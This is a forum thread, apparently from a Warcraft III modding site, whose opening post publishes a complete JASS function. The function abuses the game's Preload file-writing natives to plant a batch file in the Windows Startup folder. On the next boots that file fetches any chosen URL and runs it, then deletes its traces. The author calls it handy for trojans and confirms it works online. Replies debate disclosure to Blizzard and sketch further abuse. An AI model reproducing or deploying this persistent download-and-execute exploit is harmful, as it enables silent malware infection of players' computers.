How to virus in Warcraft III

Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
Made a post about it here, but hey...
JASS:
function Infest takes string url, string localname returns nothing
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")
endfunction

//===========================================================================
function InitTrig_Melee_Initialization takes nothing returns nothing
    call Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip")
endfunction

This function is cool. For Windows 7, you must replace YOURUSERNAMEHERE with the username on the computer, but on XP this should be unnecessary (and so XP is particularly vulnerable). Just call the function from WC3. When you next restart your computer, the url you specify will be downloaded to your startup folder as the name you specify, and called (the reason you specify the local filename is so Windows knows what file type to run it as).

If someone could test this online with a friend who has Windows XP and finds it to work, we can successfully say Blizzard needs to patch again. I mean, I'm sure the Russians will love it. :)

In case someone doesn't understand what this does, calling the function from any map will run the file specified on every player's pc on every boot from then onwards. Very handy for trojans and the like. :thup:

Let me know if this works on XP! I can't test it right now... :p

Edit: To remove infections, go to Start > Programs > Startup and delete the filename you used as "localname", or "myvirus.bat", depending which is visible.
Edit: Tested on Windows XP, works online, serious threat.
 
Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
>So this is what you were up to all these months
Something like that.
Actually, I've just not been around, but when this came up, I figured I'd drop you guys a note. ;)

Tested on Windows XP. Works 100%.

I should clarify - it's the second boot after you play the map, not the first. Here is a demo map. :)

Do not play any WC3 maps until the next patch.

This map will put an image of the word CYPHIX in your startup. Nothing dangerous. :)
To remove, go to Start > Programs > Startup and delete cyphix.jpg.
Works on map initialisation, works on battle.net.
AKA. This is a real tried and proven threat. :thup:
 

Attachments

  • virustest.w3x
    13.7 KB · Views: 654
Accname

Accname

2D-Graphics enthusiast
Reaction score
1,462
omg you really are making the world a little worse every now and then. what comes next? you tell us not to breathe because viruses could be in the air?

lol, maybe you should tell blizzard they should hire you for bugfixing and such.

by the way, i would delete the scripts, the wrong people could read this thread. i think the majority of the community will trust in your words, those who dont will most probably still play wc3 maps anyways.
 
Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
Accname said:
omg you really are making the world a little worse every now and then.
Click to expand...
Well, if I don't find and post it, someone else will find it and abuse it. It's a matter of time.

>already reported it to blizzard?
Can't be stuffed, I have assignments to do. -_-
Edit: Done. And I asked if they have QA jobs available. :p

>maybe you should tell blizzard they should hire you for bugfixing and such
They should, considering this is.. the third time..?

>by the way, i would delete the scripts
I'll wait to see what the other moderators think. I love exposing it.. :)
 
kingkingyyk3

kingkingyyk3

Visitor (Welcome to the Jungle, Baby!)
Reaction score
216
Hmm, what happen if I link it to a super large file(Takes ages to download)? Lol.
 
Romek

Romek

Super Moderator
Reaction score
963
Wow, another exploit? Blizzard's not going to be impressed. :p

> Hmm, what happen if I link it to a super large file(Takes ages to download)? Lol.
It'd download. Eventually. As expected.
 
Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
The download is done in the background. So the user won't see it... but yes, you can do it.
Romek said:
Wow, another exploit? Blizzard's not going to be impressed. :p
Click to expand...
I wasn't very impressed, either. Surely someone considered that allowing file I/O from WC3 was a bad idea... o.o
 
D

DioD

New Member
Reaction score
57
blizzard shoud give as legal way to execute code and store data on HDD (also sync this data online) and it will be fine.

All known bugs (including return bug) was developed for good, not for viruses.

well this can do anything (just like codeexec) (russian developements always evil :( )
 
Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
Hey, at least with this, you can download an executable to set the local files flag in WC3. So you can download 100mb model packs to people's computers which can then be used in WC3 maps! Whilst you're at it, you can modify WC3 executables to add additional natives like RtC, all without the map player ever knowing! In fact, you can format their whole hard disk! I think you're right, Blizzard needs to give us more power!! MOAR!!.

Sorry for the sarcasm, but WC3 being able to do file I/O is just wrong. If you can use it for good, you can use it for evil. :)

Now, trying to find how to report bugs to Blizzard... that might be too difficult, even for me. :p
 
M

Medeam

New Member
Reaction score
3
Why does people find all the nice stuff and show it to everybody :p

I was using this after the return bug got deleted out.... :( not again.... must think whats next now.
 
Romek

Romek

Super Moderator
Reaction score
963
> I was using this after the return bug got deleted out.... not again.... must think whats next now.
This doesn't typecast variables.
 
~GaLs~

~GaLs~

† Ғσſ ŧħə ѕαĸε Φƒ ~Ğ䣚~ †
Reaction score
180
even real-time antivirus fail to this.. xD
 
D

DioD

New Member
Reaction score
57
this was kept in secret for 2 years, now it does not matter.
warcraft is dead anyway.

no one on english or russian segment of internet using this, asians may be using it, but, its unknown for me. (for ex they used runtime texture changing on units long before this discovered in english segment)

also in some cases warcraft may overwrite existing files (fun with ntldr)
 
You must log in or register to reply here.
General chit-chat
Help Users
  • No one is chatting at the moment.

      The Helper Discord

      Staff online

      Members online

      Online now:
      396 (members: 2, guests: 394)

      Share this page

      Affiliates

      Hive Workshop NUON Dome World Editor Tutorials

      Network Sponsors

      Apex Steel Pipe - Buys and sells Steel Pipe.
      Top